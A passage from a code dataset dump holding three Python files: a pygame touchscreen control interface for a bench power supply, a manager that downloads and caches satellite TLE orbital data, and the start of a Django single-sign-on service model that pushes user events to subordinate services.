120, 40,\n self.setPreset(5000))\n frame.addWidget(widgets.Button, \"9 / -9\", 2, 92, 120, 40,\n self.setPreset(9000))\n frame.addWidget(widgets.Button, \"12 / -12\", 2, 137, 120, 40,\n self.setPreset(12000))\n frame.addWidget(widgets.Button, \"15 / -15\", 2, 182, 120, 40,\n self.setPreset(15000))\n\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setVoltage(self, voltage):\n self.active = False\n self.psu.setVoltage(1, voltage)\n self.psu.setVoltage(2, -1 * voltage)\n\n def setPreset(self, voltage):\n return lambda: self.setVoltage(voltage)\n\n def cancel(self):\n self.active = False\n\n def activate(self):\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\n\nclass ConfigScreen(object):\n def __init__(self, display, psu, channel, parent, negative=False):\n self.display = display\n self.channel = channel\n self.parent = parent\n self.psu = psu\n self.active = False\n self.negative = negative\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Voltage\", 2, 2, 150, 155)\n self.vdisp = frame.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=2, colour=widgets.Colours.electric_blue)\n \n bw = 28\n frame.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setVDisp(1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setVDisp(0.1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setVDisp(-1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setVDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n\n cframe = self.screen.addWidget(widgets.Frame,\n \"Current\", 162, 2, 150, 155)\n self.cdisp = cframe.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=1, colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.UpButton, 12, 4, bw, bw, self.setCDisp(1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setCDisp(0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setCDisp(0.01),\n colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.DownButton, 12, 100, bw, bw, self.setCDisp(-1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setCDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setCDisp(-0.01),\n colour=widgets.Colours.electric_blue)\n\n self.screen.addWidget(widgets.Button, \"Save\", 140, 190, 80, 40, self.save)\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setMax(self, disp, inc, mx):\n disp.value += inc\n\n if disp.value > mx:\n disp.value = mx\n if disp.value < 0:\n disp.value = 0\n\n def save(self):\n self.psu.setCurrent(self.channel, int(self.cdisp.value*1000))\n self.psu.setVoltage(self.channel, int(self.vdisp.value*1000))\n self.active = False\n\n def cancel(self):\n self.active = False\n\n def setVDisp(self, inc):\n return lambda: self.setMax(self.vdisp, inc, 15) \n\n def setCDisp(self, inc):\n return lambda: self.setMax(self.cdisp, inc, 1.5) \n\n def activate(self):\n self.vdisp.value = self.psu.vset[self.channel - 1]/1000.0\n self.cdisp.value = self.psu.cset[self.channel - 1]/1000.0\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\nclass PowerSupply(object):\n def __init__(self, display, ser):\n self.display = display\n self.psu = psu.PSU(ser)\n self.maxV = 16\n\n self.mainScreen = widgets.Pannel(display)\n self.configScreen1 = ConfigScreen(display, self.psu, 1, self)\n self.configScreen2 = ConfigScreen(display, self.psu, 2, self, True)\n self.presetScreen = PresetScreen(display, self.psu, self)\n\n self.screen = self.mainScreen\n\n self.mainScreen.addWidget(widgets.Button, \"Presets\", 225, 138, 90, 40,\n callback=self.openPresets)\n\n self.ite = self.mainScreen.addWidget(widgets.ToggleButton, \"Main On\",\n \"Main Off\", 225, 190, 90, 40, callback=self.togglePower)\n\n # Channel 1\n ch1 = self.mainScreen.addWidget(widgets.Frame, \"Channel 1\", 1, 1, 220, 110)\n self.posv = ch1.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n self.posc = ch1.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch1.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig1)\n\n # Channel 2\n ch2 = self.mainScreen.addWidget(widgets.Frame, \"Channel 2\", 1, 120, 220, 110)\n self.negv = ch2.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"-%.2f\",\n maxScale=self.maxV\n )\n self.negc = ch2.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch2.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig2)\n\n # PDU frame\n pdu = self.mainScreen.addWidget(widgets.Frame, \"PDU\", 225, 1, 90, 110)\n\n # Toggle buttons \n self.toggle_widgets = [\n ch1.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn1),\n ch2.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 1\", \"AC 1\", 10, 10, 30, 30, callback=self.btnAc1),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 2\", \"AC 2\", 50, 10, 30, 30, callback=self.btnAc2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 3\", \"AC 3\", 10, 50, 30, 30, callback=self.btnAc3),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 4\", \"AC 4\", 50, 50, 30, 30, callback=self.btnAc4),\n ]\n\n self.clock = pygame.time.Clock()\n self.c = time.time()\n self.long_c = time.time()\n self.active = False\n\n self.ncvals = []\n self.pcvals = []\n\n self.activate()\n\n def activate(self):\n self.display.clear()\n self.mainScreen.draw()\n if not self.active:\n self.active = True\n self.mainLoop()\n\n def togglePower(self, state):\n self.psu.toggleInput(state)\n\n def openPresets(self):\n self.presetScreen.activate()\n\n def btnConfig1(self):\n self.configScreen1.activate()\n\n def btnConfig2(self):\n self.configScreen2.activate()\n\n def btnEn1(self, state):\n if not state:\n self.psu.outputEnable(1)\n else:\n self.psu.outputDisable(1)\n\n def btnEn2(self, state):\n if not state:\n self.psu.outputEnable(2)\n else:\n self.psu.outputDisable(2)\n\n def btnAc1(self, state):\n if state:\n self.psu.acEnable(1)\n else:\n self.psu.acDisable(1)\n\n def btnAc2(self, state):\n if state:\n self.psu.acEnable(2)\n else:\n self.psu.acDisable(2)\n\n def btnAc3(self, state):\n if state:\n self.psu.acEnable(3)\n else:\n self.psu.acDisable(3)\n\n def btnAc4(self, state):\n if state:\n self.psu.acEnable(4)\n else:\n self.psu.acDisable(4)\n\n def tick(self):\n self.psu.tick()\n\n def slowTick(self):\n self.psu.updateState()\n self.ite.setState(self.psu.transformer)\n self.posv.value = self.psu.voltageP/1000.0\n if self.psu.currentP >= 0:\n self.pcvals.append(self.psu.currentP/1000.0)\n self.posc.value = max(self.pcvals)\n if len(self.pcvals) > 5:\n self.pcvals.pop(0)\n \n self.negv.value = -1*(self.psu.voltageN/1000.0)\n\n if self.psu.currentN >= 0:\n self.ncvals.append(self.psu.currentN/1000.0)\n self.negc.value = max(self.ncvals)\n if len(self.ncvals) > 5:\n self.ncvals.pop(0)\n\n q = False\n\n for i, w in enumerate(self.toggle_widgets):\n q = q or w.setState(self.psu.state_ar[i])\n\n if q:\n self.mainScreen.display.flip()\n\n def mainLoop(self):\n while self.active:\n self.mainScreen.update()\n\n if (time.time() - self.c > 0.02):\n self.c = time.time()\n self.tick()\n\n if (time.time() - self.long_c > 0.3):\n self.long_c = time.time()\n self.slowTick()\n\n self.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.mainScreen.sendEvent(event)\n\nif __name__ == '__main__': \n ser = serial.Serial('/dev/serial0', 57600)\n #ser = psu.FakePSU(None, None)\n mypsu = PowerSupply(surface.TouchScreen(), ser)\n #mypsu = PowerSupply(surface.Dev(), ser)\n mypsu.activate()\n", "repo_name": "calston/piwerlab", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ui.widgets.Pannel", "line_number": 21, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 21, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 23, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 23, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 26, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 28, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 30, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 30, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 32, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 32, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 34, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 34, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 37, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 62, "usage_type": "attribute"}, {"api_name": "ui.widgets.Pannel", "line_number": 79, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 79, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 81, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 81, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 83, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 83, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 84, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 87, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 87, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 88, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 88, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 89, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 90, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 91, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 92, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 92, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 93, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 93, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 94, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 94, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 96, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 96, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 98, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 98, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 99, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 101, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 101, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 102, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 102, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 103, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 103, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 104, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 105, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 105, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 106, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 106, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 108, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 108, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 109, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 109, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 110, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 110, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 111, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 111, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 112, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 112, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 113, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 113, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 115, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 115, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 116, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 116, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 154, "usage_type": "attribute"}, {"api_name": "psu.PSU", "line_number": 164, "usage_type": "call"}, {"api_name": "ui.widgets.Pannel", "line_number": 167, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 167, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 174, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 174, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 177, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 177, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 181, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 181, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 182, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 182, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 185, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 185, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 189, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 189, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 192, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 192, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 196, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 196, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 200, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 200, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 201, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 201, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 204, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 204, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 208, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 208, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 211, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 211, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 215, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 215, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 219, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 219, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 223, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 223, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 225, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 225, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 227, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 227, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 229, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 231, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 231, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 233, "usage_type": "name"}, {"api_name": "pygame.time.Clock", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 237, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 238, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "time.time", "line_number": 335, "usage_type": "call"}, {"api_name": "time.time", "line_number": 336, "usage_type": "call"}, {"api_name": "time.time", "line_number": 339, "usage_type": "call"}, {"api_name": "time.time", "line_number": 340, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 345, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 345, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 352, "usage_type": "call"}, {"api_name": "ui.surface.TouchScreen", "line_number": 354, "usage_type": "call"}, {"api_name": "ui.surface", "line_number": 354, "usage_type": "name"}]} +{"seq_id": "16203859230", "text": "#!/usr/bin/env python3\n\n'''\ntlemanager.py\n2018-11-19\njonathanwesleystone+KI5BEX@gmail.com\n\nLoad and keep updated the local TLE database.\n'''\n\nimport json\n\nfrom datetime import datetime, timezone\n\nimport requests\n\nfrom skyfield.functions import BytesIO\nfrom skyfield.iokit import parse_tle\n\nclass TleManager:\n '''Keep the TLE files updated.\n '''\n\n def __init__(self, tlesrcfile=None, tledbcurrent=None, tledbhistory=None):\n '''load up a birdlist annotated with TLE sources\n\n :param tlesrcfile: JSON file linking the birds to their TLEs\n :param tledb: JSON file containing the downloaded TLE logs and history\n '''\n\n self.tlesrcfile = 'data/tle/choice_birds.json' if tlesrcfile is None else tlesrcfile\n self.tledbcurrent = 'tledbcurrent.json' if tledbcurrent is None else tledbcurrent\n self.tledbhistory = 'tledbhistory.json' if tledbhistory is None else tledbhistory\n\n try:\n with open(self.tlesrcfile, 'r') as fin:\n self.tlesrcs = json.load(fin)\n except FileNotFoundError:\n self.tlesrcs = {\n 'sources': []\n }\n\n self.tle = self.load()\n # this has the tle with our aliases\n self.tlestring = '\\n'.join([key + '\\n' + value.replace('n', '-') for key, value in self.tle.items()])\n self.bird = self.parse()\n\n def parse(self):\n '''Parse the loaded tle data using SkyField API.\n '''\n tle = {}\n for names, sat in parse_tle(BytesIO(bytes(self.tlestring, 'ascii'))):\n tle[sat.model.satnum] = sat\n for name in names:\n tle[name] = sat\n\n return tle\n\n def load(self):\n '''load the current tle data into a dict of {bird_alias: 'tle\\nlines'}\n '''\n\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {\n 'sources': []\n }\n\n bird_tles = {}\n for source in self.tlesrcs['sources']:\n if source in tledbcurrent:\n lines = tledbcurrent[source]['body'].splitlines()\n for birdname, bird in self.tlesrcs['birds'].items():\n if 'source' in bird and bird['source'] == source:\n lineiter = iter(lines)\n for line in lineiter:\n if bird['name'] == line.strip():\n bird_tles[birdname] = ((birdname + (' ' * 24))[:24]) + \\\n '\\n' + next(lineiter) + '\\n' + next(lineiter)\n break\n\n return bird_tles\n\n def update(self, keep_history=True):\n '''update the tles if needed\n '''\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {}\n\n try:\n with open(self.tledbhistory, 'r') as fin:\n tledbhistory = json.load(fin)\n except FileNotFoundError:\n tledbhistory = {}\n\n for source in self.tlesrcs['sources']:\n wsrc = tledbcurrent.get(source, {})\n\n headers = {}\n if 'etag' in wsrc:\n headers['etag'] = wsrc['etag']\n if 'last-modified' in wsrc:\n headers['If-Modified-Since'] = wsrc['last-modified']\n\n response = requests.get(self.tlesrcs['sources'][source]['url'], headers=headers)\n\n now = datetime.now(timezone.utc).astimezone().isoformat()\n\n wsrc['checked'] = now\n wsrc['status'] = response.status_code\n\n if response.status_code == 200:\n wsrc['body'] = response.text\n wsrc['updated'] = now\n\n if 'etag' in response.headers:\n wsrc['etag'] = response.headers['etag']\n if 'last-modified' in response.headers:\n wsrc['last-modified'] = response.headers['last-modified']\n\n tledbcurrent[source] = wsrc\n\n if keep_history:\n tledbhistory[source] = tledbhistory.get(source, [])\n tledbhistory[source].append({\n 'when': now,\n 'status': response.status_code,\n 'text': response.text,\n 'etag': response.headers.get('etag'),\n 'last-modified': response.headers.get('last-modified')\n })\n\n with open(self.tledbcurrent, 'w') as fout:\n json.dump(tledbcurrent, fout)\n\n if keep_history:\n with open(self.tledbhistory, 'w') as fout:\n json.dump(tledbhistory, fout)\n\n def __getitem__(self, bird):\n '''Bird fetcher -- return SkyField Satellite object parsed from the TLE identified by bird.\n '''\n return self.bird[bird]\n\nclass TestTleManager(TleManager):\n '''Test wrapper for TleManager.\n '''\n\n def __init__(self):\n '''Call super with test arguments for convenience.\n '''\n super().__init__(None, 'data/test/tledbcurrent.json', 'data/test/tledbhistory.json')\n", "repo_name": "piratejon/birdplans", "sub_path": "birdplans/tlemanager.py", "file_name": "tlemanager.py", "file_ext": "py", "file_size_in_byte": 5197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "skyfield.iokit.parse_tle", "line_number": 52, "usage_type": "call"}, {"api_name": "skyfield.functions.BytesIO", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 112, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 112, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 139, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "19973138297", "text": "import logging\nfrom inspect import ismethod, isfunction\nfrom typing import Union\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import QuerySet\nfrom django.db.models.base import ModelBase\nfrom django.utils.crypto import get_random_string\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_sso.exceptions import SSOException\nfrom django_sso.sso_gateway import Settings\n\nuser_model = get_user_model()\n\n\ndef service_token_generator():\n return get_random_string(Service.token.field.max_length)\n\n\nclass Service(models.Model):\n name = models.CharField(max_length=128, verbose_name=_('Name'))\n base_url = models.URLField(verbose_name=_('Base url'))\n enabled = models.BooleanField(default=False, verbose_name=_('Enabled'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), unique=True, default=service_token_generator)\n\n def __str__(self):\n return self.base_url\n\n def _send_event(self, event_type, data):\n text = None\n fail = False\n\n if hasattr(settings, 'SSO_SUBORDINATE_COMMUNICATION_TIMEOUT'):\n timeout = settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT\n\n assert type(settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT) in (int, float)\n else:\n timeout = 0.1 # 100ms\n\n try:\n result = requests.post(\n f'{self.base_url}/sso/event/',\n json={\n 'type': event_type,\n 'token': self.token,\n **data\n },\n headers={\n \"Content-Type\": \"application/json\"\n },\n timeout=timeout\n )\n except Exception as e:\n logging.error(f\"Django SSO: {_('Failed to communicate with subordinated service')} {self.base_url}: {e}\")\n\n return\n\n try:\n assert result.status_code == 200, f\"{result.text}\"\n data = result.json()\n\n ok = not not (data['ok'] if 'ok' in data else False)\n\n if ok:\n return ok\n elif 'error' in data:\n raise Exception(f\"Django SSO: {_('Error raised on subordinate service')}: {data['error']}\")\n else:\n raise Exception(result.text)\n except Exception as e:\n logging.error(f'{_(\"Incorrect response from subordinated service\")}: STATUS={result.status_code}; TEXT={e}')\n\n return\n\n @staticmethod\n def build_update_user_event(user):\n \"\"\"\n Build event for accounts update on subbordinated services\n\n Args:\n user: AbstractBaseUser based classes are allowed\n \"\"\"\n event = {\n 'fields': {}\n }\n\n for field in ('is_active', 'is_staff', 'is_superuser'):\n if hasattr(user_model, field):\n event['fields'][field] = bool(getattr(user, field))\n\n event['fields'][\"user_identy\"] = getattr(user, user_model.USERNAME_FIELD)\n\n if hasattr(settings, 'SSO') and 'ADDITIONAL_FIELDS' in settings.SSO:\n for additional_field in settings.SSO['ADDITIONAL_FIELDS']:\n field_info = additional_field.split(':')\n alias = field_info[1] if len(field_info) == 2 else None\n\n result = user\n\n try:\n for prop in field_info[0].split('.'):\n try:\n value = getattr(result, prop)\n except ObjectDoesNotExist:\n value = None\n break\n\n if value != None:\n result = value\n else:\n result = None\n break\n\n if ismethod(result):\n result = result()\n elif isinstance(result, models.Model):\n if hasattr(result, 'to_sso_representation'):\n result = result.to_sso_representation()\n else:\n result = str(result)\n except Exception as e:\n logging.warning('Django SSO: failed to read value for field %s: %s' % (field_info[0], e))\n result = None\n\n event['fields'][alias if alias else additional_field] = result\n\n return event\n\n @staticmethod\n def build_update_fields_event(user_identities: Union[set, QuerySet], instance: ModelBase):\n \"\"\"\n Build event for fields update on subbordinated services. Fields of related model.\n\n Args:\n user_identities: QuerySet with users\n instance: An updated related model\n \"\"\"\n\n sso_settings = Settings()\n\n event = {\n \"fields\": {},\n \"user_identities\": (\n [*user_identities.values_list(get_user_model().USERNAME_FIELD, flat=True)]\n if isinstance(user_identities, QuerySet)\n else user_identities\n )\n }\n\n for field_info in sso_settings.affected_models_fields[instance.__class__]:\n field_info = field_info.split(':')\n field_alias = field_info[1] if len(field_info) == 2 else None\n field_path = field_info[0].split('.')\n field_name = field_alias if field_alias else field_info[0]\n\n if instance:\n if len(field_path) == 1:\n if hasattr(instance, 'to_sso_representation'):\n value = instance.to_sso_representation()\n else:\n value = str(instance)\n elif len(field_path) == 2:\n model_attr = getattr(instance, field_path[1])\n\n if model_attr is None:\n value = None\n elif ismethod(model_attr):\n value = model_attr()\n elif isinstance(model_attr, property):\n value = model_attr\n else:\n value = model_attr\n else:\n logging.error('Django SSO: Unhandled exception. Contact developer with information about it.')\n\n if type(value) not in (str, bool, float, int):\n logging.error(\n f\"Django SSO: For additional field '{field_info}' provided unsupported type {type(value)}\"\n )\n value = None\n\n event['fields'][field_name] = value\n else:\n event['fields'][field_name] = None\n\n return event\n\n def deauthenticate(self, user: Union[str, ModelBase]):\n \"\"\"\n Send deauthentication event to subordinate service, if that active\n\n Args:\n user: User model object or user identy - username field value\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event('deauthenticate', {\n 'user_identy': user if type(user) == str else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def delete_user(self, user: Union[ModelBase, str]):\n \"\"\"\n Casts user deletion event\n\n @param user: User identy string or UserModel instance\n \"\"\"\n return self._send_event('delete_user', {\n 'user_identy': user if isinstance(user, str) else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def change_user_identy(self, old, new):\n \"\"\"\n Emit event for changing user identy.\n\n In cases, when you change login|email|etc...\n\n @param old: Old user identy\n @param new: New user identy\n \"\"\"\n return self._send_event('change_user_identy', {\n 'old': old,\n 'new': new\n })\n\n def update_account(self, user) -> bool:\n \"\"\"\n Send account information to subordinated service, if subordinated service is active\n \"\"\"\n if not self.enabled:\n return True\n\n return 